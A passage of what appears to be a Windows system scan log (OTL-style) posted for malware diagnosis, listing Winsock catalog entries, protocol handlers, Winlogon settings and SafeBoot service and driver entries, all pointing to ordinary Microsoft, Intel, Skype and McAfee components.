NameSpace_Catalog5\Catalog_Entries64\000000000004 [] - C:\Windows\SysNative\nlaapi.dll (Microsoft Corporation)O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000005 [] - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000006 [] - C:\Windows\SysNative\winrnr.dll (Microsoft Corporation)O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000007 [] - C:\Windows\SysNative\wshbth.dll (Microsoft Corporation)O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000001 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000002 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000003 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000004 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000005 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000006 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000007 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000008 -

C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000009 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000010 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000011 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)O10 - NameSpace_Catalog5\Catalog_Entries\000000000001 [] - C:\Windows\SysWOW64\NapiNSP.dll (Microsoft Corporation)O10 - NameSpace_Catalog5\Catalog_Entries\000000000002 [] - C:\Windows\SysWOW64\pnrpnsp.dll (Microsoft Corporation)O10 - NameSpace_Catalog5\Catalog_Entries\000000000003 [] - C:\Windows\SysWOW64\pnrpnsp.dll (Microsoft Corporation)O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Windows\SysWOW64\nlaapi.dll (Microsoft Corporation)O10 - NameSpace_Catalog5\Catalog_Entries\000000000005 [] - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O10 - NameSpace_Catalog5\Catalog_Entries\000000000006 [] - C:\Windows\SysWOW64\winrnr.dll (Microsoft Corporation)O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Windows\SysWOW64\wshbth.dll (Microsoft Corporation)O10 - Protocol_Catalog9\Catalog_Entries\000000000001 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O10 - Protocol_Catalog9\Catalog_Entries\000000000002 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O10 - Protocol_Catalog9\Catalog_Entries\000000000003 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O10 - Protocol_Catalog9\Catalog_Entries\000000000004 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O10 - Protocol_Catalog9\Catalog_Entries\000000000005 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O10 - Protocol_Catalog9\Catalog_Entries\000000000006 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O10 - Protocol_Catalog9\Catalog_Entries\000000000007 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O10 - Protocol_Catalog9\Catalog_Entries\000000000008 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O10 - Protocol_Catalog9\Catalog_Entries\000000000009 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O10 - Protocol_Catalog9\Catalog_Entries\000000000010 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O10 - Protocol_Catalog9\Catalog_Entries\000000000011 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)O13[b]64bit:[/b] - gopher Prefix: missingO13 - gopher Prefix: missingO17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.178.1O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{6D49CB69-04FF-4B5F-A6DB-BF6D416FC400}: DhcpNameServer = 192.168.178.1O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{B340C248-3F1B-4FAD-AB8E-F7545517BCE1}: DhcpNameServer = 192.168.1.1O18:[b]64bit:[/b] - Protocol\Handler\about {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysNative\mshtml.dll (Microsoft Corporation)

O18:[b]64bit:[/b] - Protocol\Handler\cdl {3dd53d40-7b8b-11D0-b013-00aa0059ce02} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\dvd {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\Windows\SysNative\MSVidCtl.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\file {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\ftp {79eac9e3-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\http {79eac9e2-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\https {79eac9e5-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\its {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\Windows\SysNative\itss.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\javascript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} -C:\Windows\SysNative\mshtml.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\livecall - No CLSID value foundO18:[b]64bit:[/b] - Protocol\Handler\local {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\mailto {3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysNative\mshtml.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\mhtml {05300401-BCBC-11d0-85E3-00C04FD85AB4} - C:\Windows\SysNative\inetcomm.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\mk {79eac9e6-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\ms-its {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\Windows\SysNative\itss.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\msnim - No CLSID value foundO18:[b]64bit:[/b] - Protocol\Handler\res {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysNative\mshtml.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\skype4com - No CLSID value foundO18:[b]64bit:[/b] - Protocol\Handler\tv {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E} - C:\Windows\SysNative\MSVidCtl.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\vbscript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysNative\mshtml.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Handler\wlmailhtml - No CLSID value foundO18:[b]64bit:[/b] - Protocol\Handler\wlpg - No CLSID value foundO18 - Protocol\Handler\about {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll (Microsoft Corporation)O18 - Protocol\Handler\cdl {3dd53d40-7b8b-11D0-b013-00aa0059ce02} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)O18 - Protocol\Handler\dvd {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\Windows\SysWOW64\MSVidCtl.dll (Microsoft Corporation)O18 - Protocol\Handler\file {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)O18 - Protocol\Handler\ftp {79eac9e3-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)O18 - Protocol\Handler\http {79eac9e2-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)O18 - Protocol\Handler\https {79eac9e5-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)O18 - Protocol\Handler\its {9D148291-B9C8-11D0-A4CC-0000F80149F6} -

C:\Windows\SysWOW64\itss.dll (Microsoft Corporation)O18 - Protocol\Handler\javascript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll (Microsoft Corporation)O18 - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll (Microsoft Corporation)O18 - Protocol\Handler\local {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)O18 - Protocol\Handler\mailto {3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll (Microsoft Corporation)O18 - Protocol\Handler\mhtml {05300401-BCBC-11d0-85E3-00C04FD85AB4} - C:\Windows\SysWOW64\inetcomm.dll (Microsoft Corporation)O18 - Protocol\Handler\mk {79eac9e6-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)O18 - Protocol\Handler\ms-its {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\Windows\SysWOW64\itss.dll (Microsoft Corporation)O18 - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll (Microsoft Corporation)O18 - Protocol\Handler\res {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll (Microsoft Corporation)O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\ProgramFiles (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)O18 - Protocol\Handler\tv {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E} - C:\Windows\SysWOW64\MSVidCtl.dll (Microsoft Corporation)O18 - Protocol\Handler\vbscript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll (Microsoft Corporation)O18 - Protocol\Handler\wlmailhtml {03C514A3-1EFB-4856-9F99-10D7BE1653C0} - C:\Program Files (x86)\Windows Live\Mail\mailcomm.dll (Microsoft Corporation)O18 - Protocol\Handler\wlpg {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files(x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Filter\application/octet-stream {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\Windows\SysNative\mscoree.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Filter\application/x-complus {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\Windows\SysNative\mscoree.dll (Microsoft Corporation)O18:[b]64bit:[/b] - Protocol\Filter\application/x-msdownload {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\Windows\SysNative\mscoree.dll (Microsoft Corporation)O18 - Protocol\Filter\application/octet-stream {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation)O18 - Protocol\Filter\application/x-complus {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation)O18 - Protocol\Filter\application/x-msdownload {1E66F26B-79EE-11D2-8710-00C04F79ED0D} -C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation)O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)O20:[b]64bit:[/b] - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\SysNative\SystemPropertiesPerformance.exe (Microsoft Corporation)O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) -

C:\Windows\SysWow64\SystemPropertiesPerformance.exe (Microsoft Corporation)O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.O27:[b]64bit:[/b] - HKLM IFEO\cltmngsvc.exe: Debugger - File not foundO27 - HKLM IFEO\cltmngsvc.exe: Debugger - File not foundO29:[b]64bit:[/b] - HKLM SecurityProviders - (credssp.dll) - C:\Windows\SysWow64\credssp.dll (Microsoft Corporation)O29 - HKLM SecurityProviders - (credssp.dll) - C:\Windows\SysWow64\credssp.dll (Microsoft Corporation)O30:[b]64bit:[/b] - LSA: Authentication Packages - (msv1_0) - C:\Windows\SysNative\msv1_0.dll (Microsoft Corporation)O30 - LSA: Authentication Packages - (msv1_0) - C:\Windows\SysWow64\msv1_0.dll (Microsoft Corporation)O31 - SafeBoot: AlternateShell - cmd.exeO32 - HKLM CDRom: AutoRun - 1O34 - HKLM BootExecute: (autocheck autochk *)O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*O35 - HKLM\..comfile [open] -- "%1" %*O35 - HKLM\..exefile [open] -- "%1" %*O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*O37 - HKLM\...com [@ = comfile] -- "%1" %*O37 - HKLM\...exe [@ = exefile] -- "%1" %*O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)O38 - SubSystems\\Windows: (ServerDll=sxssrv,4) NetSvcs:[b]64bit:[/b] lfsvc - C:\Windows\SysNative\GeofenceMonitorService.dll (Microsoft Corporation)NetSvcs:[b]64bit:[/b] wlidsvc - C:\Windows\SysNative\wlidsvc.dll (Microsoft Corporation)NetSvcs:[b]64bit:[/b] DsmSvc - C:\Windows\SysNative\DeviceSetupManager.dll (Microsoft Corporation)NetSvcs:[b]64bit:[/b] NcaSvc - C:\Windows\SysNative\NcaSvc.dll (Microsoft Corporation) SafeBootMin:[b]64bit:[/b] AppMgmt - ServiceSafeBootMin:[b]64bit:[/b] Base - Driver GroupSafeBootMin:[b]64bit:[/b] BasicDisplay.sys - C:\Windows\SysNative\drivers\BasicDisplay.sys (Microsoft Corporation)SafeBootMin:[b]64bit:[/b] BasicRender.sys - C:\Windows\SysNative\drivers\BasicRender.sys (Microsoft Corporation)SafeBootMin:[b]64bit:[/b] Boot Bus Extender - Driver GroupSafeBootMin:[b]64bit:[/b] Boot file system - Driver GroupSafeBootMin:[b]64bit:[/b] BrokerInfrastructure - C:\Windows\SysNative\bisrv.dll (Microsoft Corporation)SafeBootMin:[b]64bit:[/b] EFS - C:\Windows\SysNative\efssvc.dll (Microsoft Corporation)SafeBootMin:[b]64bit:[/b] File system - Driver GroupSafeBootMin:[b]64bit:[/b] Filter - Driver Group

SafeBootMin:[b]64bit:[/b] HelpSvc - ServiceSafeBootMin:[b]64bit:[/b] KeyIso - C:\Windows\SysNative\keyiso.dll (Microsoft Corporation)SafeBootMin:[b]64bit:[/b] LSM - C:\Windows\SysNative\lsm.dll (Microsoft Corporation)SafeBootMin:[b]64bit:[/b] MCODS - Reg Error: Value error.SafeBootMin:[b]64bit:[/b] mcpltsvc - SafeBootMin:[b]64bit:[/b] Netlogon - C:\Windows\SysNative\netlogon.dll (Microsoft Corporation)SafeBootMin:[b]64bit:[/b] PCI Configuration - Driver GroupSafeBootMin:[b]64bit:[/b] PNP Filter - Driver GroupSafeBootMin:[b]64bit:[/b] Primary disk - Driver GroupSafeBootMin:[b]64bit:[/b] sacsvr - ServiceSafeBootMin:[b]64bit:[/b] SCSI Class - Driver GroupSafeBootMin:[b]64bit:[/b] System Bus Extender - Driver GroupSafeBootMin:[b]64bit:[/b] SystemEventsBroker - C:\Windows\SysNative\SystemEventsBrokerServer.dll (Microsoft Corporation)SafeBootMin:[b]64bit:[/b] TBS - ServiceSafeBootMin:[b]64bit:[/b] vmms - ServiceSafeBootMin:[b]64bit:[/b] WinDefend - C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation)SafeBootMin:[b]64bit:[/b] {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllersSafeBootMin:[b]64bit:[/b] {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM DriveSafeBootMin:[b]64bit:[/b] {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDriveSafeBootMin:[b]64bit:[/b] {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controllerSafeBootMin:[b]64bit:[/b] {4D36E96A-E325-11CE-BFC1-08002BE10318} - HdcSafeBootMin:[b]64bit:[/b] {4D36E96B-E325-11CE-BFC1-08002BE10318} - KeyboardSafeBootMin:[b]64bit:[/b] {4D36E96F-E325-11CE-BFC1-08002BE10318} - MouseSafeBootMin:[b]64bit:[/b] {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA AdaptersSafeBootMin:[b]64bit:[/b] {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapterSafeBootMin:[b]64bit:[/b] {4D36E97D-E325-11CE-BFC1-08002BE10318} - SystemSafeBootMin:[b]64bit:[/b] {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk driveSafeBootMin:[b]64bit:[/b] {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copySafeBootMin:[b]64bit:[/b] {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus hostcontrollersSafeBootMin:[b]64bit:[/b] {71A27CDD-812A-11D0-BEC7-08002BE2092F} - VolumeSafeBootMin:[b]64bit:[/b] {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface DevicesSafeBootMin:[b]64bit:[/b] {9DA2B80F-F89F-4A49-A5C2-511B085B9E8A} - Enhanced Storage DevicesSafeBootMin:[b]64bit:[/b] {A0A588A4-C46F-4B37-B7EA-C82FE89870C6} - SDA Standard Compliant SD Host ControllerSafeBootMin:[b]64bit:[/b] {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 DevicesSafeBootMin:[b]64bit:[/b] {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevicesSafeBootMin: AppMgmt - ServiceSafeBootMin: Base - Driver GroupSafeBootMin: Boot Bus Extender - Driver GroupSafeBootMin: Boot file system - Driver GroupSafeBootMin: File system - Driver GroupSafeBootMin: Filter - Driver GroupSafeBootMin: HelpSvc - Service

SafeBootMin: MCODS - Reg Error: Value error.SafeBootMin: mcpltsvc - SafeBootMin: PCI Configuration - Driver GroupSafeBootMin: PNP Filter - Driver GroupSafeBootMin: Primary disk - Driver GroupSafeBootMin: sacsvr - ServiceSafeBootMin: SCSI Class - Driver GroupSafeBootMin: System Bus Extender - Driver GroupSafeBootMin: TBS - ServiceSafeBootMin: vmms - ServiceSafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllersSafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM DriveSafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDriveSafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controllerSafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - HdcSafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - KeyboardSafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - MouseSafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA AdaptersSafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapterSafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - SystemSafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk driveSafeBootMin: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copySafeBootMin: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllersSafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - VolumeSafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface DevicesSafeBootMin: {9DA2B80F-F89F-4A49-A5C2-511B085B9E8A} - Enhanced Storage DevicesSafeBootMin: {A0A588A4-C46F-4B37-B7EA-C82FE89870C6} - SDA Standard Compliant SD Host ControllerSafeBootMin: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 DevicesSafeBootMin: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices SafeBootNet:[b]64bit:[/b] AppMgmt - ServiceSafeBootNet:[b]64bit:[/b] Base - Driver GroupSafeBootNet:[b]64bit:[/b] BasicDisplay.sys - C:\Windows\SysNative\drivers\BasicDisplay.sys (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] BasicRender.sys - C:\Windows\SysNative\drivers\BasicRender.sys (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] Boot Bus Extender - Driver GroupSafeBootNet:[b]64bit:[/b] Boot file system - Driver GroupSafeBootNet:[b]64bit:[/b] BrokerInfrastructure - C:\Windows\SysNative\bisrv.dll (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] EFS - C:\Windows\SysNative\efssvc.dll (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] File system - Driver GroupSafeBootNet:[b]64bit:[/b] Filter - Driver GroupSafeBootNet:[b]64bit:[/b] HelpSvc - ServiceSafeBootNet:[b]64bit:[/b] KeyIso - C:\Windows\SysNative\keyiso.dll (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] LSM - C:\Windows\SysNative\lsm.dll (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] MCODS - Reg Error: Value error.SafeBootNet:[b]64bit:[/b] mcpltsvc - SafeBootNet:[b]64bit:[/b] Messenger - ServiceSafeBootNet:[b]64bit:[/b] mfefire - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe ()

SafeBootNet:[b]64bit:[/b] mfefirek - C:\Windows\SysNative\drivers\mfefirek.sys (McAfee, Inc.)SafeBootNet:[b]64bit:[/b] mfefirek.sys - C:\Windows\SysNative\drivers\mfefirek.sys (McAfee, Inc.)SafeBootNet:[b]64bit:[/b] mfehidk - C:\Windows\SysNative\drivers\mfehidk.sys (McAfee, Inc.)SafeBootNet:[b]64bit:[/b] mfehidk.sys - C:\Windows\SysNative\drivers\mfehidk.sys (McAfee, Inc.)SafeBootNet:[b]64bit:[/b] mfevtp - C:\Windows\SysNative\mfevtps.exe (McAfee, Inc.)SafeBootNet:[b]64bit:[/b] NDIS Wrapper - Driver GroupSafeBootNet:[b]64bit:[/b] NetBIOSGroup - Driver GroupSafeBootNet:[b]64bit:[/b] NetDDEGroup - Driver GroupSafeBootNet:[b]64bit:[/b] Netlogon - C:\Windows\SysNative\netlogon.dll (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] netprofm - C:\Windows\SysNative\netprofmsvc.dll (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] Network - Driver GroupSafeBootNet:[b]64bit:[/b] NetworkProvider - Driver GroupSafeBootNet:[b]64bit:[/b] PCI Configuration - Driver GroupSafeBootNet:[b]64bit:[/b] PNP Filter - Driver GroupSafeBootNet:[b]64bit:[/b] PNP_TDI - Driver GroupSafeBootNet:[b]64bit:[/b] Primary disk - Driver GroupSafeBootNet:[b]64bit:[/b] rdpencdd.sys - DriverSafeBootNet:[b]64bit:[/b] rdsessmgr - ServiceSafeBootNet:[b]64bit:[/b] sacsvr - ServiceSafeBootNet:[b]64bit:[/b] SCSI Class - Driver GroupSafeBootNet:[b]64bit:[/b] SmartcardSimulator - DriverSafeBootNet:[b]64bit:[/b] Streams Drivers - Driver GroupSafeBootNet:[b]64bit:[/b] System Bus Extender - Driver GroupSafeBootNet:[b]64bit:[/b] SystemEventsBroker - C:\Windows\SysNative\SystemEventsBrokerServer.dll (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] TBS - ServiceSafeBootNet:[b]64bit:[/b] TDI - Driver GroupSafeBootNet:[b]64bit:[/b] VaultSvc - C:\Windows\SysNative\vaultsvc.dll (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] VirtualSmartcardReader - DriverSafeBootNet:[b]64bit:[/b] vmms - ServiceSafeBootNet:[b]64bit:[/b] Wcmsvc - C:\Windows\SysNative\wcmsvc.dll (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] WinDefend - C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation)SafeBootNet:[b]64bit:[/b] WudfUsbccidDriver - DriverSafeBootNet:[b]64bit:[/b] {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllersSafeBootNet:[b]64bit:[/b] {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM DriveSafeBootNet:[b]64bit:[/b] {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDriveSafeBootNet:[b]64bit:[/b] {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controllerSafeBootNet:[b]64bit:[/b] {4D36E96A-E325-11CE-BFC1-08002BE10318} - HdcSafeBootNet:[b]64bit:[/b] {4D36E96B-E325-11CE-BFC1-08002BE10318} - KeyboardSafeBootNet:[b]64bit:[/b] {4D36E96F-E325-11CE-BFC1-08002BE10318} - MouseSafeBootNet:[b]64bit:[/b] {4D36E972-E325-11CE-BFC1-08002BE10318} - NetSafeBootNet:[b]64bit:[/b] {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClientSafeBootNet:[b]64bit:[/b] {4D36E974-E325-11CE-BFC1-08002BE10318} - NetServiceSafeBootNet:[b]64bit:[/b] {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTransSafeBootNet:[b]64bit:[/b] {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA AdaptersSafeBootNet:[b]64bit:[/b] {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapterSafeBootNet:[b]64bit:[/b] {4D36E97D-E325-11CE-BFC1-08002BE10318} - System

SafeBootNet:[b]64bit:[/b] {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk driveSafeBootNet:[b]64bit:[/b] {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readersSafeBootNet:[b]64bit:[/b] {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copySafeBootNet:[b]64bit:[/b] {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllersSafeBootNet:[b]64bit:[/b] {71A27CDD-812A-11D0-BEC7-08002BE2092F} - VolumeSafeBootNet:[b]64bit:[/b] {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface DevicesSafeBootNet:[b]64bit:[/b] {9DA2B80F-F89F-4A49-A5C2-511B085B9E8A} - Enhanced Storage DevicesSafeBootNet:[b]64bit:[/b] {A0A588A4-C46F-4B37-B7EA-C82FE89870C6} - SDA Standard Compliant SD Host ControllerSafeBootNet:[b]64bit:[/b] {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 DevicesSafeBootNet:[b]64bit:[/b] {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevicesSafeBootNet: AppMgmt - ServiceSafeBootNet: Base - Driver GroupSafeBootNet: Boot Bus Extender - Driver GroupSafeBootNet: Boot file system - Driver GroupSafeBootNet: File system - Driver GroupSafeBootNet: Filter - Driver GroupSafeBootNet: HelpSvc - ServiceSafeBootNet: MCODS - Reg Error: Value error.SafeBootNet: mcpltsvc - SafeBootNet: Messenger - ServiceSafeBootNet: NDIS Wrapper - Driver GroupSafeBootNet: NetBIOSGroup - Driver GroupSafeBootNet: NetDDEGroup - Driver GroupSafeBootNet: Network - Driver GroupSafeBootNet: NetworkProvider - Driver GroupSafeBootNet: PCI Configuration - Driver GroupSafeBootNet: PNP Filter - 